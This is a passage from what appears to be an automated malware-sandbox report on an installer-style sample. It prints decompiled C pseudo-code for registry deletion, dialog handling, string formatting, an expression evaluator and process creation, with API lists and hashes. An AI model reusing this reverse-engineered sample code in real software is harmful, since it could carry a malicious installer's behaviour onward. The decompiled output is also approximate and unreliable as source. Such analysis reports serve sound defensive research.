                                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse5FEA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse5FEA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nse5FEA.tmp
                                                                                                            • API String ID: 1356686001-2605072419
                                                                                                            • Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                            • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                            • Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                            • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 73611837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E73611837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7361405c = _a8;
				_t77 = 0;
				 *0x73614060 = _a16;
				_v12 = 0;
				_v8 = E7361123B();
				_t90 = E736112FE(_t42);
				_t87 = _t85;
				_t81 = E7361123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7361123B();
					_t77 = E736112FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73611429(_t85, _t90, _t87,  &_v52);
								E73611266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73612EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73612F10(_t59, _t83, _t85);
						} else {
							_t48 = E73612F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73612D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73612E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73612D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                            0x73611837
                                                                                                            0x73611841
                                                                                                            0x7361184a
                                                                                                            0x7361184d
                                                                                                            0x73611852
                                                                                                            0x7361185b
                                                                                                            0x73611864
                                                                                                            0x73611866
                                                                                                            0x7361186d
                                                                                                            0x7361186f
                                                                                                            0x73611872
                                                                                                            0x73611876
                                                                                                            0x73611882
                                                                                                            0x7361188b
                                                                                                            0x73611890
                                                                                                            0x73611893
                                                                                                            0x73611899
                                                                                                            0x73611899
                                                                                                            0x7361189c
                                                                                                            0x7361189f
                                                                                                            0x736118a2
                                                                                                            0x73611968
                                                                                                            0x73611968
                                                                                                            0x7361196b
                                                                                                            0x736119e5
                                                                                                            0x736119e9
                                                                                                            0x736119f8
                                                                                                            0x736119fb
                                                                                                            0x73611a03
                                                                                                            0x73611a03
                                                                                                            0x73611a03
                                                                                                            0x73611a05
                                                                                                            0x73611a05
                                                                                                            0x73611a06
                                                                                                            0x73611a06
                                                                                                            0x73611a08
                                                                                                            0x73611a0a
                                                                                                            0x73611a10
                                                                                                            0x73611a19
                                                                                                            0x73611a2a
                                                                                                            0x73611a35
                                                                                                            0x73611a35
                                                                                                            0x736119fd
                                                                                                            0x736119e0
                                                                                                            0x736119e0
                                                                                                            0x736119e2
                                                                                                            0x736119e2
                                                                                                            0x00000000
                                                                                                            0x736119e2
                                                                                                            0x736119ff
                                                                                                            0x73611a01
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611a01
                                                                                                            0x736119ed
                                                                                                            0x736119f1
                                                                                                            0x00000000
                                                                                                            0x736119f1
                                                                                                            0x7361196d
                                                                                                            0x7361196d
                                                                                                            0x7361196e
                                                                                                            0x736119d7
                                                                                                            0x736119d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736119db
                                                                                                            0x736119de
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736119de
                                                                                                            0x73611970
                                                                                                            0x73611970
                                                                                                            0x73611971
                                                                                                            0x736119aa
                                                                                                            0x736119ae
                                                                                                            0x736119ca
                                                                                                            0x736119cd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736119cf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736119d1
                                                                                                            0x736119d3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736119d5
                                                                                                            0x736119b0
                                                                                                            0x736119b4
                                                                                                            0x736119b6
                                                                                                            0x736119b8
                                                                                                            0x736119ba
                                                                                                            0x736119c3
                                                                                                            0x736119bc
                                                                                                            0x736119bc
                                                                                                            0x736119bc
                                                                                                            0x00000000
                                                                                                            0x736119ba
                                                                                                            0x73611973
                                                                                                            0x73611973
                                                                                                            0x73611976
                                                                                                            0x736119a3
                                                                                                            0x736119a5
                                                                                                            0x00000000
                                                                                                            0x736119a5
                                                                                                            0x73611978
                                                                                                            0x73611978
                                                                                                            0x7361197b
                                                                                                            0x7361198b
                                                                                                            0x7361198f
                                                                                                            0x7361199c
                                                                                                            0x7361199e
                                                                                                            0x00000000
                                                                                                            0x7361199e
                                                                                                            0x73611991
                                                                                                            0x73611993
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611995
                                                                                                            0x73611998
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361199a
                                                                                                            0x7361197e
                                                                                                            0x7361197f
                                                                                                            0x73611985
                                                                                                            0x73611987
                                                                                                            0x73611987
                                                                                                            0x00000000
                                                                                                            0x7361197f
                                                                                                            0x736118a8
                                                                                                            0x73611920
                                                                                                            0x73611922
                                                                                                            0x73611925
                                                                                                            0x73611943
                                                                                                            0x73611946
                                                                                                            0x7361194c
                                                                                                            0x73611951
                                                                                                            0x73611927
                                                                                                            0x73611927
                                                                                                            0x7361192b
                                                                                                            0x7361192f
                                                                                                            0x73611931
                                                                                                            0x73611931
                                                                                                            0x73611954
                                                                                                            0x73611957
                                                                                                            0x00000000
                                                                                                            0x7361195d
                                                                                                            0x7361195d
                                                                                                            0x73611960
                                                                                                            0x00000000
                                                                                                            0x73611960
                                                                                                            0x73611957
                                                                                                            0x736118aa
                                                                                                            0x736118ad
                                                                                                            0x73611911
                                                                                                            0x73611913
                                                                                                            0x73611915
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361191b
                                                                                                            0x736118af
                                                                                                            0x736118b2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736118b4
                                                                                                            0x736118b5
                                                                                                            0x736118eb
                                                                                                            0x736118ef
                                                                                                            0x73611907
                                                                                                            0x73611909
                                                                                                            0x00000000
                                                                                                            0x73611909
                                                                                                            0x736118f1
                                                                                                            0x736118f3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736118f9
                                                                                                            0x736118fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73611902
                                                                                                            0x736118b7
                                                                                                            0x736118ba
                                                                                                            0x736118e1
                                                                                                            0x00000000
                                                                                                            0x736118bc
                                                                                                            0x736118bc
                                                                                                            0x736118bd
                                                                                                            0x736118d1
                                                                                                            0x736118d3
                                                                                                            0x736118bf
                                                                                                            0x736118c1
                                                                                                            0x736118c7
                                                                                                            0x736118c9
                                                                                                            0x736118c9
                                                                                                            0x736118c1
                                                                                                            0x00000000
                                                                                                            0x736118bd

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 44be01f473ac9b96f19883ba7c3d64b0c710987eab8a36b5d04bf38cd4b11ba9
                                                                                                            • Instruction ID: 0803cf0e548bd0f938d31ab9e5573c08cefc01123914169ccec524c1eebe0081
                                                                                                            • Opcode Fuzzy Hash: 44be01f473ac9b96f19883ba7c3d64b0c710987eab8a36b5d04bf38cd4b11ba9
                                                                                                            • Instruction Fuzzy Hash: 805156F2D0419BAFEB02CFB5CA447AEBFBABB44241F18055AD417E31C4C2B19A718761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                                            0x00402a57
                                                                                                            0x00402a5f
                                                                                                            0x00402a87
                                                                                                            0x00402a71
                                                                                                            0x00402ac1
                                                                                                            0x00402ac7
                                                                                                            0x00000000
                                                                                                            0x00402ac9
                                                                                                            0x00402a85
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402a85
                                                                                                            0x00402a9c
                                                                                                            0x00402aa4
                                                                                                            0x00402aab
                                                                                                            0x00402ad7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402adf
                                                                                                            0x00402ae7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402ae7
                                                                                                            0x00000000
                                                                                                            0x00402aba
                                                                                                            0x00402ace

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                            • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                            • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                            • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                            0x00401ccb
                                                                                                            0x00401cd2
                                                                                                            0x00401d01
                                                                                                            0x00401d09
                                                                                                            0x00401d10
                                                                                                            0x00401d10
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 00401CC5
                                                                                                            • GetClientRect.USER32 ref: 00401CD2
                                                                                                            • LoadImageA.USER32 ref: 00401CF3
                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                            • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                            • Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                            • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 51%
                                                                                                            			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                            0x004046f9
                                                                                                            0x004046fd
                                                                                                            0x00404705
                                                                                                            0x00404708
                                                                                                            0x00404709
                                                                                                            0x0040470b
                                                                                                            0x0040470d
                                                                                                            0x00404710
                                                                                                            0x00404710
                                                                                                            0x00404717
                                                                                                            0x0040471d
                                                                                                            0x0040471d
                                                                                                            0x00404724
                                                                                                            0x0040472f
                                                                                                            0x00404730
                                                                                                            0x00404733
                                                                                                            0x00404733
                                                                                                            0x00404740
                                                                                                            0x0040474b
                                                                                                            0x0040474e
                                                                                                            0x00404760
                                                                                                            0x00404767
                                                                                                            0x00404768
                                                                                                            0x00404777
                                                                                                            0x00404787
                                                                                                            0x004047a3

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                            • wsprintfA.USER32 ref: 00404787
                                                                                                            • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                            • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                            • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                            • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 51%
                                                                                                            			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                            0x00401bb6
                                                                                                            0x00401bc2
                                                                                                            0x00401bc5
                                                                                                            0x00401bce
                                                                                                            0x00401bce
                                                                                                            0x00401bd1
                                                                                                            0x00401bd5
                                                                                                            0x00401bde
                                                                                                            0x00401bde
                                                                                                            0x00401be1
                                                                                                            0x00401be5
                                                                                                            0x00401be7
                                                                                                            0x00401c34
                                                                                                            0x00401c36
                                                                                                            0x00401c3f
                                                                                                            0x00401c47
                                                                                                            0x00401c4a
                                                                                                            0x00401c4a
                                                                                                            0x00401c53
                                                                                                            0x00000000
                                                                                                            0x00401be9
                                                                                                            0x00401bf0
                                                                                                            0x00401bf2
                                                                                                            0x00401bfa
                                                                                                            0x00401bfd
                                                                                                            0x00401c25
                                                                                                            0x00401c59
                                                                                                            0x00401c59
                                                                                                            0x00401bff
                                                                                                            0x00401c0d
                                                                                                            0x00401c15
                                                                                                            0x00401c18
                                                                                                            0x00401c18
                                                                                                            0x00401bfd
                                                                                                            0x00401c5c
                                                                                                            0x00401c5f
                                                                                                            0x00401c65
                                                                                                            0x00402833
                                                                                                            0x00402833
                                                                                                            0x0040288e
                                                                                                            0x0040289a

                                                                                                            APIs
                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                            • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                            • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                            • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
